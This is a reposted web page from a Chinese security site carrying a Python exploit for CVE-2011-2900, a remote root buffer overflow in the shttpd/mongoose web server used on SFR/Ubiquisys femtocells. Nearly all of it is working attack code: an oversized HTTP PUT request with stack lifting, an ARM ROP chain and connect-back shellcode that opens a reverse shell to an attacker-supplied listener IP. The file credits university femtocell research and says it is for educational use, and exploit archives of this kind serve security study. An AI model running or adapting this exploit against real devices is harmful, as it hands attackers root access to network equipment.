首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Simple HTTPd 1.42 PUT Request Remote Buffer Overflow Vulnerability
来源:vfocus.net 作者:nion 发布时间:2011-08-16  

#!/usr/bin/env python
# part of femtocell research by TU-Berlin
# only for educational purposes
# Exploit Title: remote root on sfr/ubiquisys femtocell webserver (wsal/shttpd/mongoose)
# Date: 2011-08-02
# Author: nion
# Software: http://code.google.com/p/mongoose/ http://sourceforge.net/projects/shttpd/
# Version: shttpd <= 1.42, mongoose <= 3.0
# CVE: CVE-2011-2900
# Tested on: Linux (proprietary embedded distro) Linux 2.6.18-ubi-sys-V2.0.17

import socket, sys, time
import urllib, struct

if(len(sys.argv) < 3):
 print sys.argv[0] + " <target ip> <listening ip>"
 sys.exit(-1)

target   = sys.argv[1]
listener = sys.argv[2]

SHELLCODE  = 0xbc568        # shellcode backup in connect struct, heap is not randomized
STACK_LIFT = "%a0%ce%31%40" # didnt want to use urllib to encode at this point
                            # because it moves the heap address depending on if character is printable or not
       # and i was too lazy to adjust the payload when cleaning up the exploit :)

buf = "PUT /"
buf += "A" * 107 # first fill bytes will not be 148 because stack layout looks different when leaving put_dir()
buf += STACK_LIFT

# repeated stack lifting
for i in xrange(0, 26):
 buf += "A" * 148
 buf += STACK_LIFT

buf += "B"*132    # padding to overwrite pc, last jump will go over this one
buf += STACK_LIFT # this will hit pc and produce our first jump
                  # add sp, sp, #132; pop {r4, r5, r6, r7, pc}

buf += "A"*12     # this will be our last stack lifting after
buf += STACK_LIFT # jumping through our buffer back up

# lets finish the path chunk and make some padding for the
# last stack lift before pc gets popped to a different place
buf+="AAAAAAAAA/"+"A"*138


# first jump
buf += urllib.quote(struct.pack("<L", 0x4032a410))
# --,
#   v
# prepare lr so we can properly return from __clear_cache
# 0x4032a410 <makecontext+28>:  pop {lr}        ; (ldr lr, [sp], #4)
# 0x4032a414 <makecontext+32>:  add sp, sp, #8  ; 0x8
# 0x4032a418 <makecontext+36>:  bx  lr
buf+=urllib.quote(struct.pack("<L", 0x403e937c)) # free_slotinfo+128, return from __clear_cache
buf+="DDDDDDDD" # skip sp lifting, 8 dummy bytes because sp is lifted before branching

# --, bx lr
#   v
# 0x403e937c <free_slotinfo+128>:   pop {r4, pc}
buf+="CCCC" # dummy r4
buf+=urllib.quote(struct.pack("<L", 0x402e5064)) # __aeabi_cfcmple+16
# --,
#   v
# 0x402e5064 <__aeabi_cfcmple+16>:   pop {r0, r1, r2, r3, pc}
buf+="AAAA" # dummy r0
buf+="CCCC" # dummy r1 (needed for __clear_cache)
buf+="DDDD"*2 # dummy r2, r3
buf+=urllib.quote(struct.pack("<L", 0x40364bbc)) # envz_merge+184
# --,
#   v
# 0x40364bbc <envz_merge+184>:  mov r0, r11
# 0x40364bc0 <envz_merge+188>:  pop {r4, r5, r6, r7, r8, r9, r11, pc}
# at this point r11 points to an address on the heap in front of
# our shellcode, e.g. 0xad220
buf+="FFFF"*7 # dummy r4-r9+r11
buf+=urllib.quote(struct.pack("<L", 0x402e5484)) # __clear_cache
# --,
#   v
# __clear_cache will return to our prepare lr (free_slotinfo+128)
# 0x403e937c <free_slotinfo+128>:   pop {r4, pc}
buf+="AAAA" # dummy r4
buf +=urllib.quote(struct.pack("<L", SHELLCODE)) # jump to shellcode

# shellcode + some testing garbage in front of it
buf += "A"*16 # some garbage padding in front of our payload, could be nops or whatever

# make listener shellcode friendly
evil_haxxor = urllib.quote("".join([struct.pack("B", int(x)) for x in listener.split('.')]))

# connect back shellcode
buf += "%01%10%8F%E2%11%FF%2F%E1%02%20%01%21%92%1A%0F%02%19%37%01%DF%06%1C%08%A1%10%22%02%37%01%DF%3F%27%02%21%30%1c%01%df%01%39%FB%D5%05%A0%92%1A%05%b4%69%46%0b%27%01%DF%C0%46%02%00%11%5c" + evil_haxxor + "%2f%62%69%6e%2f%73%68%00/ HTTP/1.0\r\n"


s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target, 80))
s.send(buf)
s.send("\r\n")
print s.recv(1024)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sagem Router Fast 3304/3464/35
·Mozilla Firefox 3.6.16 mChanne
·Contrexx Shopsystem <= 2.2 SP3
·F-secure Browsing Protection (
·D.R. Software Audio Converter
·Media Player Classic v1.2.1008
·NSHC Papyrus Heap Overflow Vul
·RealPlayer 12.0.1.660 Stack Ov
·SikaBoom Remote Buffer Overflo
·RealPlayer 12.0.1.660 Stack Ha
·MS10-026 Microsoft MPEG Layer-
·VLC Media Player 1.1.10 The Lu
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved